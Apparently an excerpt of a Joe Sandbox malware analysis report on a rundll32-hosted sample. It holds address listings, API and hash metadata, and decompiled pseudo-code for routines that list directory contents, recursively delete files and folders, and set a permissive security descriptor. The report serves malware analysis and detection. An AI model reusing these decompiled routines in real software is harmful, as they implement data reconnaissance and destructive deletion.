                                                                                              0x0425cb15
                                                                                              0x0425cb18
                                                                                              0x0425cb18
                                                                                              0x0425cb40
                                                                                              0x0425cb42
                                                                                              0x0425cb42
                                                                                              0x0425cb45
                                                                                              0x0425cb48
                                                                                              0x0425cb48
                                                                                              0x0425cb4a
                                                                                              0x0425cb50
                                                                                              0x0425cb50
                                                                                              0x0425cb56
                                                                                              0x0425cb59
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cb5b
                                                                                              0x0425cb5c
                                                                                              0x0425cb5f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cb5f
                                                                                              0x0425cb61
                                                                                              0x0425cb64
                                                                                              0x0425cb76
                                                                                              0x0425cb76
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cb78
                                                                                              0x0425cb78
                                                                                              0x0425cb7a
                                                                                              0x0425cde0
                                                                                              0x0425cdf4
                                                                                              0x0425cdf9
                                                                                              0x0425cb80
                                                                                              0x0425cb80
                                                                                              0x0425cb86
                                                                                              0x0425cb94
                                                                                              0x0425cb97
                                                                                              0x0425cb9a
                                                                                              0x0425cba0
                                                                                              0x0425cba0
                                                                                              0x0425cba0
                                                                                              0x0425cba2
                                                                                              0x0425cba2
                                                                                              0x0425cba8
                                                                                              0x0425cbac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cbae
                                                                                              0x0425cbaf
                                                                                              0x0425cbb2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cbb2
                                                                                              0x0425cbb4
                                                                                              0x0425cbb7
                                                                                              0x0425cbcb
                                                                                              0x0425cbcd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cdde
                                                                                              0x0425cdde
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425cbb9
                                                                                              0x0425cbb9
                                                                                              0x0425cbba
                                                                                              0x0425cbba
                                                                                              0x0425cbbe
                                                                                              0x0425cbc1
                                                                                              0x00000000
                                                                                              0x0425cbc1
                                                                                              0x0425cb86
                                                                                              0x00000000
                                                                                              0x0425cb66
                                                                                              0x0425cb66
                                                                                              0x0425cb67
                                                                                              0x0425cb67
                                                                                              0x0425cb6c
                                                                                              0x00000000
                                                                                              0x0425cb6c
                                                                                              0x0425cacf
                                                                                              0x0425cabd
                                                                                              0x0425cab0
                                                                                              0x0425ca9f
                                                                                              0x0425ca97
                                                                                              0x0425ca61
                                                                                              0x0425ca4a
                                                                                              0x0425ca2b
                                                                                              0x0425ca1a
                                                                                              0x0425c9f0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000), ref: 0425C9E6
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0425CA12
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000050,00003000,00000004,?,74CB43E0), ref: 0425CDEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressAllocHandleModuleProcVirtual
                                                                                              • String ID: .$Pjj$RtlGetVersion$j$ntdll
                                                                                              • API String ID: 3695083113-758095414
                                                                                              • Opcode ID: 0c763eec70adfd3ff9918cca3be8244fe84d598e8a7650c72b444c84bf425760
                                                                                              • Instruction ID: fb36b8b7acfd65fa018dd9084842ec4f23327f3b91172901a3f9e74047a6e072
                                                                                              • Opcode Fuzzy Hash: 0c763eec70adfd3ff9918cca3be8244fe84d598e8a7650c72b444c84bf425760
                                                                                              • Instruction Fuzzy Hash: 9DC12872B2531A4BCB24CF59C8907BDBB70FF05310F2101AECD56AB6A1F671A942DB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 57%
                                                                                              			E04254C20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v12;
                                                                                              				short _v1056;
                                                                                              				intOrPtr _v1624;
                                                                                              				struct _WIN32_FIND_DATAW _v1648;
                                                                                              				char _v1649;
                                                                                              				long _v1656;
                                                                                              				void* _v1660;
                                                                                              				intOrPtr _v1664;
                                                                                              				signed int _t47;
                                                                                              				void* _t54;
                                                                                              				signed int _t56;
                                                                                              				signed int _t57;
                                                                                              				signed int _t66;
                                                                                              				signed int _t67;
                                                                                              				intOrPtr _t83;
                                                                                              				void* _t84;
                                                                                              				intOrPtr _t85;
                                                                                              				intOrPtr* _t87;
                                                                                              				void* _t95;
                                                                                              				intOrPtr _t96;
                                                                                              				intOrPtr _t97;
                                                                                              				intOrPtr _t98;
                                                                                              				void* _t100;
                                                                                              				void* _t101;
                                                                                              				void* _t102;
                                                                                              				long _t104;
                                                                                              				void* _t106;
                                                                                              				signed int _t107;
                                                                                              				void* _t108;
                                                                                              				void* _t109;
                                                                                              
                                                                                              				_t85 = __ecx;
                                                                                              				_t47 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t47 ^ _t107;
                                                                                              				_t83 = __ecx;
                                                                                              				_t104 = 0x2800;
                                                                                              				_v1664 = __ecx;
                                                                                              				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                                                              				_v1656 = 0x2800;
                                                                                              				wsprintfW( &_v1056, L"%s\\*.*", _a4);
                                                                                              				_t109 = _t108 + 0xc;
                                                                                              				_t54 = FindFirstFileW( &_v1056,  &_v1648);
                                                                                              				_v1660 = _t54;
                                                                                              				if(_t54 != 0xffffffff) {
                                                                                              					_t84 = LocalAlloc(0x40, 0x2800);
                                                                                              					_t100 = 1;
                                                                                              					 *_t84 = 0x69;
                                                                                              					do {
                                                                                              						_t14 = _t104 - 0x410; // 0x23f0
                                                                                              						if(_t100 > _t14) {
                                                                                              							_t104 = _t104 + 0x410;
                                                                                              							_v1656 = _t104;
                                                                                              							_t84 = LocalReAlloc(_t84, _t104, 0x42);
                                                                                              						}
                                                                                              						_t87 = ".";
                                                                                              						_t56 =  &(_v1648.cFileName);
                                                                                              						while(1) {
                                                                                              							_t95 =  *_t56;
                                                                                              							if(_t95 !=  *_t87) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if(_t95 == 0) {
                                                                                              								L10:
                                                                                              								_t57 = 0;
                                                                                              							} else {
                                                                                              								_t98 =  *((intOrPtr*)(_t56 + 2));
                                                                                              								_t18 = _t87 + 2; // 0x2e0000
                                                                                              								if(_t98 !=  *_t18) {
                                                                                              									break;
                                                                                              								} else {
                                                                                              									_t56 = _t56 + 4;
                                                                                              									_t87 = _t87 + 4;
                                                                                              									if(_t98 != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L10;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							L12:
                                                                                              							if(_t57 != 0) {
                                                                                              								_t66 = L"..";
                                                                                              								_t87 =  &(_v1648.cFileName);
                                                                                              								while(1) {
                                                                                              									_t96 =  *_t87;
                                                                                              									if(_t96 !=  *_t66) {
                                                                                              										break;
                                                                                              									}
                                                                                              									if(_t96 == 0) {
                                                                                              										L18:
                                                                                              										_t67 = 0;
                                                                                              									} else {
                                                                                              										_t97 =  *((intOrPtr*)(_t87 + 2));
                                                                                              										_t21 = _t66 + 2; // 0x2e
                                                                                              										if(_t97 !=  *_t21) {
                                                                                              											break;
                                                                                              										} else {
                                                                                              											_t87 = _t87 + 4;
                                                                                              											_t66 = _t66 + 4;
                                                                                              											if(_t97 != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												goto L18;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									L20:
                                                                                              									if(_t67 != 0) {
                                                                                              										 *(_t100 + _t84) = _v1648.dwFileAttributes & 0x00000010;
                                                                                              										_t101 = _t100 + 1;
                                                                                              										_t106 = 2 + lstrlenW( &(_v1648.cFileName)) * 2;
                                                                                              										E0427E060(_t101 + _t84,  &(_v1648.cFileName), _t106);
                                                                                              										_t102 = _t101 + _t106;
                                                                                              										_t104 = _v1656;
                                                                                              										_t109 = _t109 + 0xc;
                                                                                              										 *((intOrPtr*)(_t102 + _t84)) = _v1648.nFileSizeHigh;
                                                                                              										 *((intOrPtr*)(_t102 + _t84 + 4)) = _v1648.nFileSizeLow;
                                                                                              										 *((intOrPtr*)(_t102 + _t84 + 8)) = _v1648.ftLastWriteTime;
                                                                                              										 *((intOrPtr*)(_t102 + _t84 + 0xc)) = _v1624;
                                                                                              										_t100 = _t102 + 0x10;
                                                                                              									}
                                                                                              									goto L22;
                                                                                              								}
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t67 = _t66 | 0x00000001;
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t57 = _t56 | 0x00000001;
                                                                                              						goto L12;
                                                                                              						L22:
                                                                                              					} while (FindNextFileW(_v1660,  &_v1648) != 0);
                                                                                              					_push(_t87);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t100);
                                                                                              					E04251C60( *((intOrPtr*)(_v1664 + 4)));
                                                                                              					LocalFree(_t84);
                                                                                              					FindClose(_v1660);
                                                                                              					return E04275AFE(_v12 ^ _t107, _t84);
                                                                                              				} else {
                                                                                              					_push(_t85);
                                                                                              					_push(0x3f);
                                                                                              					_push(1);
                                                                                              					_v1649 = 0x69;
                                                                                              					E04251C60( *((intOrPtr*)(_t83 + 4)));
                                                                                              					return E04275AFE(_v12 ^ _t107,  &_v1649);
                                                                                              				}
                                                                                              			}

































                                                                                              0x04254c20
                                                                                              0x04254c29
                                                                                              0x04254c30
                                                                                              0x04254c3a
                                                                                              0x04254c47
                                                                                              0x04254c4c
                                                                                              0x04254c53
                                                                                              0x04254c5a
                                                                                              0x04254c60
                                                                                              0x04254c66
                                                                                              0x04254c77
                                                                                              0x04254c7d
                                                                                              0x04254c86
                                                                                              0x04254cc3
                                                                                              0x04254cc5
                                                                                              0x04254cca
                                                                                              0x04254cd0
                                                                                              0x04254cd0
                                                                                              0x04254cd8
                                                                                              0x04254cda
                                                                                              0x04254ce4
                                                                                              0x04254cf0
                                                                                              0x04254cf0
                                                                                              0x04254cf2
                                                                                              0x04254cf7
                                                                                              0x04254d00
                                                                                              0x04254d00
                                                                                              0x04254d06
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254d0b
                                                                                              0x04254d22
                                                                                              0x04254d22
                                                                                              0x04254d0d
                                                                                              0x04254d0d
                                                                                              0x04254d11
                                                                                              0x04254d15
                                                                                              0x00000000
                                                                                              0x04254d17
                                                                                              0x04254d17
                                                                                              0x04254d1a
                                                                                              0x04254d20
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254d20
                                                                                              0x04254d15
                                                                                              0x04254d2b
                                                                                              0x04254d2d
                                                                                              0x04254d33
                                                                                              0x04254d38
                                                                                              0x04254d40
                                                                                              0x04254d40
                                                                                              0x04254d46
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254d4b
                                                                                              0x04254d62
                                                                                              0x04254d62
                                                                                              0x04254d4d
                                                                                              0x04254d4d
                                                                                              0x04254d51
                                                                                              0x04254d55
                                                                                              0x00000000
                                                                                              0x04254d57
                                                                                              0x04254d57
                                                                                              0x04254d5a
                                                                                              0x04254d60
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254d60
                                                                                              0x04254d55
                                                                                              0x04254d6b
                                                                                              0x04254d6d
                                                                                              0x04254d77
                                                                                              0x04254d81
                                                                                              0x04254d88
                                                                                              0x04254d9b
                                                                                              0x04254da6
                                                                                              0x04254da8
                                                                                              0x04254dae
                                                                                              0x04254db1
                                                                                              0x04254dba
                                                                                              0x04254dc4
                                                                                              0x04254dce
                                                                                              0x04254dd2
                                                                                              0x04254dd2
                                                                                              0x00000000
                                                                                              0x04254d6d
                                                                                              0x04254d66
                                                                                              0x04254d68
                                                                                              0x00000000
                                                                                              0x04254d68
                                                                                              0x00000000
                                                                                              0x04254d2d
                                                                                              0x04254d26
                                                                                              0x04254d28
                                                                                              0x00000000
                                                                                              0x04254dd5
                                                                                              0x04254de8
                                                                                              0x04254df0
                                                                                              0x04254df7
                                                                                              0x04254df9
                                                                                              0x04254dfe
                                                                                              0x04254e06
                                                                                              0x04254e12
                                                                                              0x04254e2a
                                                                                              0x04254c88
                                                                                              0x04254c88
                                                                                              0x04254c92
                                                                                              0x04254c94
                                                                                              0x04254c97
                                                                                              0x04254c9e
                                                                                              0x04254cb3
                                                                                              0x04254cb3

                                                                                              APIs
                                                                                              • wsprintfW.USER32 ref: 04254C60
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 04254C77
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800), ref: 04254CBD
                                                                                              • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04254CEA
                                                                                              • lstrlenW.KERNEL32(?), ref: 04254D82
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 04254DE2
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F), ref: 04254E06
                                                                                              • FindClose.KERNEL32(?), ref: 04254E12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                                                              • String ID: %s\*.*$i
                                                                                              • API String ID: 4084865168-1236837797
                                                                                              • Opcode ID: e7054329cc0c98be2887c1c243292054128dc2ce1880b6514d4d65cf59b6ac77
                                                                                              • Instruction ID: 4626c4592b090d5caf9cb1b0394cfdb6f41380f68d0bb044ed08bdbf8d14745b
                                                                                              • Opcode Fuzzy Hash: e7054329cc0c98be2887c1c243292054128dc2ce1880b6514d4d65cf59b6ac77
                                                                                              • Instruction Fuzzy Hash: 3351D571B11119ABDB20EF28DC84BE9F7B9EF94314F4041A5E90DD7251DB32AE94CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 55%
                                                                                              			E04254E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
                                                                                              				signed int _v12;
                                                                                              				short _v1056;
                                                                                              				short _v2096;
                                                                                              				struct _WIN32_FIND_DATAW _v2688;
                                                                                              				intOrPtr _v2692;
                                                                                              				signed int _t26;
                                                                                              				signed int _t33;
                                                                                              				signed int _t34;
                                                                                              				signed int _t41;
                                                                                              				signed int _t42;
                                                                                              				void* _t54;
                                                                                              				intOrPtr* _t56;
                                                                                              				intOrPtr* _t59;
                                                                                              				void* _t63;
                                                                                              				void* _t64;
                                                                                              				intOrPtr _t65;
                                                                                              				intOrPtr _t66;
                                                                                              				void* _t68;
                                                                                              				WCHAR* _t70;
                                                                                              				signed int _t71;
                                                                                              				void* _t72;
                                                                                              				void* _t73;
                                                                                              
                                                                                              				_t26 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t26 ^ _t71;
                                                                                              				_t70 = _a4;
                                                                                              				_t68 = wsprintfW;
                                                                                              				_v2692 = __ecx;
                                                                                              				wsprintfW( &_v2096, L"%s\\*.*", _t70);
                                                                                              				_t73 = _t72 + 0xc;
                                                                                              				_t54 = FindFirstFileW( &_v2096,  &_v2688);
                                                                                              				if(_t54 != 0xffffffff) {
                                                                                              					do {
                                                                                              						_t56 = ".";
                                                                                              						_t33 =  &(_v2688.cFileName);
                                                                                              						while(1) {
                                                                                              							_t63 =  *_t33;
                                                                                              							if(_t63 !=  *_t56) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if(_t63 == 0) {
                                                                                              								L7:
                                                                                              								_t34 = 0;
                                                                                              							} else {
                                                                                              								_t66 =  *((intOrPtr*)(_t33 + 2));
                                                                                              								_t10 = _t56 + 2; // 0x2e0000
                                                                                              								if(_t66 !=  *_t10) {
                                                                                              									break;
                                                                                              								} else {
                                                                                              									_t33 = _t33 + 4;
                                                                                              									_t56 = _t56 + 4;
                                                                                              									if(_t66 != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L7;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							L9:
                                                                                              							if(_t34 != 0) {
                                                                                              								_t59 = L"..";
                                                                                              								_t41 =  &(_v2688.cFileName);
                                                                                              								while(1) {
                                                                                              									_t64 =  *_t41;
                                                                                              									if(_t64 !=  *_t59) {
                                                                                              										break;
                                                                                              									}
                                                                                              									if(_t64 == 0) {
                                                                                              										L15:
                                                                                              										_t42 = 0;
                                                                                              									} else {
                                                                                              										_t65 =  *((intOrPtr*)(_t41 + 2));
                                                                                              										_t13 = _t59 + 2; // 0x2e
                                                                                              										if(_t65 !=  *_t13) {
                                                                                              											break;
                                                                                              										} else {
                                                                                              											_t41 = _t41 + 4;
                                                                                              											_t59 = _t59 + 4;
                                                                                              											if(_t65 != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												goto L15;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									L17:
                                                                                              									if(_t42 != 0) {
                                                                                              										_push( &(_v2688.cFileName));
                                                                                              										_push(_t70);
                                                                                              										_push(L"%s\\%s");
                                                                                              										_push( &_v1056);
                                                                                              										if((_v2688.dwFileAttributes & 0x00000010) == 0) {
                                                                                              											wsprintfW();
                                                                                              											_t73 = _t73 + 0x10;
                                                                                              											DeleteFileW( &_v1056);
                                                                                              										} else {
                                                                                              											wsprintfW();
                                                                                              											_t73 = _t73 + 0x10;
                                                                                              											E04254E30(_t54, _v2692, _t68, _t70,  &_v1056);
                                                                                              										}
                                                                                              									}
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t42 = _t41 | 0x00000001;
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t34 = _t33 | 0x00000001;
                                                                                              						goto L9;
                                                                                              						L21:
                                                                                              					} while (FindNextFileW(_t54,  &_v2688) != 0);
                                                                                              					FindClose(_t54);
                                                                                              					RemoveDirectoryW(_t70);
                                                                                              					return E04275AFE(_v12 ^ _t71);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v12 ^ _t71);
                                                                                              				}
                                                                                              			}

























                                                                                              0x04254e39
                                                                                              0x04254e40
                                                                                              0x04254e45
                                                                                              0x04254e4f
                                                                                              0x04254e5c
                                                                                              0x04254e62
                                                                                              0x04254e64
                                                                                              0x04254e7b
                                                                                              0x04254e80
                                                                                              0x04254ea0
                                                                                              0x04254ea0
                                                                                              0x04254ea5
                                                                                              0x04254eb0
                                                                                              0x04254eb0
                                                                                              0x04254eb6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254ebb
                                                                                              0x04254ed2
                                                                                              0x04254ed2
                                                                                              0x04254ebd
                                                                                              0x04254ebd
                                                                                              0x04254ec1
                                                                                              0x04254ec5
                                                                                              0x00000000
                                                                                              0x04254ec7
                                                                                              0x04254ec7
                                                                                              0x04254eca
                                                                                              0x04254ed0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254ed0
                                                                                              0x04254ec5
                                                                                              0x04254edb
                                                                                              0x04254edd
                                                                                              0x04254ee3
                                                                                              0x04254ee8
                                                                                              0x04254ef0
                                                                                              0x04254ef0
                                                                                              0x04254ef6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254efb
                                                                                              0x04254f12
                                                                                              0x04254f12
                                                                                              0x04254efd
                                                                                              0x04254efd
                                                                                              0x04254f01
                                                                                              0x04254f05
                                                                                              0x00000000
                                                                                              0x04254f07
                                                                                              0x04254f07
                                                                                              0x04254f0a
                                                                                              0x04254f10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254f10
                                                                                              0x04254f05
                                                                                              0x04254f1b
                                                                                              0x04254f1d
                                                                                              0x04254f2c
                                                                                              0x04254f2d
                                                                                              0x04254f34
                                                                                              0x04254f39
                                                                                              0x04254f3a
                                                                                              0x04254f55
                                                                                              0x04254f57
                                                                                              0x04254f61
                                                                                              0x04254f3c
                                                                                              0x04254f3c
                                                                                              0x04254f4a
                                                                                              0x04254f4e
                                                                                              0x04254f4e
                                                                                              0x04254f3a
                                                                                              0x00000000
                                                                                              0x04254f1d
                                                                                              0x04254f16
                                                                                              0x04254f18
                                                                                              0x00000000
                                                                                              0x04254f18
                                                                                              0x00000000
                                                                                              0x04254edd
                                                                                              0x04254ed6
                                                                                              0x04254ed8
                                                                                              0x00000000
                                                                                              0x04254f67
                                                                                              0x04254f75
                                                                                              0x04254f7e
                                                                                              0x04254f85
                                                                                              0x04254fa0
                                                                                              0x04254e82
                                                                                              0x04254e94
                                                                                              0x04254e94

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                                                              • String ID: %s\%s$%s\*.*
                                                                                              • API String ID: 2470771279-1665845743
                                                                                              • Opcode ID: ef0762f056fce775338afb96279c7bd0a4f47c38c4a263ba6c439388751fcde4
                                                                                              • Instruction ID: c98b328052b957b3e48acde201b9b0c2024540759f89f1d9d07afaf9b6323c5e
                                                                                              • Opcode Fuzzy Hash: ef0762f056fce775338afb96279c7bd0a4f47c38c4a263ba6c439388751fcde4
                                                                                              • Instruction Fuzzy Hash: 4F41B1727202199AEB20BF78DD45BEAF3A9EF55214F4140A9D90AD3151EB32FAC4CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0425AE60(void* __ebx, void* __edi, void* __esi, struct _SECURITY_DESCRIPTOR* _a4) {
                                                                                              				signed int _v8;
                                                                                              				short _v12;
                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                              				void* _v20;
                                                                                              				struct _SECURITY_DESCRIPTOR* _v24;
                                                                                              				signed int _t16;
                                                                                              				struct _SECURITY_DESCRIPTOR* _t18;
                                                                                              				void* _t20;
                                                                                              				long _t38;
                                                                                              				long _t46;
                                                                                              				void* _t48;
                                                                                              				signed int _t49;
                                                                                              
                                                                                              				_t16 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t16 ^ _t49;
                                                                                              				_t18 = _a4;
                                                                                              				_t48 = 0;
                                                                                              				_v24 = _t18;
                                                                                              				_v20 = 0;
                                                                                              				_t46 = 0;
                                                                                              				_v16.Value = 0;
                                                                                              				_v12 = 0x100;
                                                                                              				if(InitializeSecurityDescriptor(_t18, 1) != 0 && AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
                                                                                              					_t10 = GetLengthSid(_v20) + 0x10; // 0x10
                                                                                              					_t38 = _t10;
                                                                                              					_t48 = RtlAllocateHeap(GetProcessHeap(), 8, _t38);
                                                                                              					if(_t48 != 0 && InitializeAcl(_t48, _t38, 2) != 0 && AddAccessAllowedAce(_t48, 2, 0x10000000, _v20) != 0) {
                                                                                              						SetSecurityDescriptorDacl(_v24, 1, _t48, 0);
                                                                                              						_t46 =  !=  ? 1 : 0;
                                                                                              					}
                                                                                              				}
                                                                                              				_t20 = _v20;
                                                                                              				if(_t20 != 0) {
                                                                                              					FreeSid(_t20);
                                                                                              				}
                                                                                              				if(_t46 != 0) {
                                                                                              					return E04275AFE(_v8 ^ _t49);
                                                                                              				} else {
                                                                                              					if(_t48 != 0) {
                                                                                              						HeapFree(GetProcessHeap(), _t46, _t48);
                                                                                              					}
                                                                                              					return E04275AFE(_v8 ^ _t49);
                                                                                              				}
                                                                                              			}















                                                                                              0x0425ae66
                                                                                              0x0425ae6d
                                                                                              0x0425ae70
                                                                                              0x0425ae77
                                                                                              0x0425ae79
                                                                                              0x0425ae7d
                                                                                              0x0425ae84
                                                                                              0x0425ae86
                                                                                              0x0425ae89
                                                                                              0x0425ae97
                                                                                              0x0425aebf
                                                                                              0x0425aebf
                                                                                              0x0425aed2
                                                                                              0x0425aed6
                                                                                              0x0425af02
                                                                                              0x0425af0f
                                                                                              0x0425af0f
                                                                                              0x0425af12
                                                                                              0x0425af13
                                                                                              0x0425af18
                                                                                              0x0425af1b
                                                                                              0x0425af1b
                                                                                              0x0425af23
                                                                                              0x0425af5d
                                                                                              0x0425af25
                                                                                              0x0425af27
                                                                                              0x0425af32
                                                                                              0x0425af32
                                                                                              0x0425af49
                                                                                              0x0425af49

                                                                                              APIs
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(0425B60D,00000001,74D0F560,74CB6490), ref: 0425AE8F
                                                                                              • AllocateAndInitializeSid.ADVAPI32(0425B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0425AEAB
                                                                                              • GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0425AEB9
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0425AEC5
                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0425AECC
                                                                                              • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0425AEDC
                                                                                              • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0425AEF1
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0425AF02
                                                                                              • FreeSid.ADVAPI32(00000000), ref: 0425AF1B
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0425AF2B
                                                                                              • HeapFree.KERNEL32(00000000), ref: 0425AF32
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$Initialize$AllocateDescriptorFreeProcessSecurity$AccessAllowedDaclLength
                                                                                              • String ID:
                                                                                              • API String ID: 629205620-0
                                                                                              • Opcode ID: 136d550e052b80c305eecff6bd18f43e4ee7692f90dc48bca7214a7c358b633b
                                                                                              • Instruction ID: 65432b1bf44b0dce8decf23bf2f17ede4b7fe8b06a9afff87444c63ef93fd6fa
                                                                                              • Opcode Fuzzy Hash: 136d550e052b80c305eecff6bd18f43e4ee7692f90dc48bca7214a7c358b633b
                                                                                              • Instruction Fuzzy Hash: 0D316D71B18219ABDB20EFA9EC4DFAFBBACEF54701F004129B905E2191DF759D0187A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E042645C0(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v12;
                                                                                              				short _v16;
                                                                                              				char _v536;
                                                                                              				WCHAR* _v540;
                                                                                              				WCHAR* _v544;
                                                                                              				signed int _t35;
                                                                                              				char* _t41;
                                                                                              				WCHAR* _t46;
                                                                                              				short _t49;
                                                                                              				short _t50;
                                                                                              				WCHAR* _t51;
                                                                                              				long _t53;
                                                                                              				signed int _t56;
                                                                                              				signed int _t63;
                                                                                              				long _t64;
                                                                                              				WCHAR* _t68;
                                                                                              				long _t70;
                                                                                              				WCHAR* _t74;
                                                                                              				signed int _t76;
                                                                                              				void* _t98;
                                                                                              				WCHAR* _t101;
                                                                                              				void* _t104;
                                                                                              				long _t105;
                                                                                              				WCHAR* _t106;
                                                                                              				signed int _t107;
                                                                                              				void* _t108;
                                                                                              				void* _t109;
                                                                                              				void* _t110;
                                                                                              				void* _t111;
                                                                                              				long _t115;
                                                                                              
                                                                                              				_t98 = __edi;
                                                                                              				_t35 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t35 ^ _t107;
                                                                                              				_t104 = __ecx;
                                                                                              				_v540 = __edx;
                                                                                              				E0427DEA0(__edi, __edx, 0, 0x208);
                                                                                              				E0427DEA0(_t98,  &_v536, 0, 0x208);
                                                                                              				_t109 = _t108 + 0x18;
                                                                                              				_t41 =  &_v536;
                                                                                              				__imp__GetProcessImageFileNameW(_t104, _t41, 0x104);
                                                                                              				if(_t41 == 0) {
                                                                                              					L16:
                                                                                              					__eflags = _v8 ^ _t107;
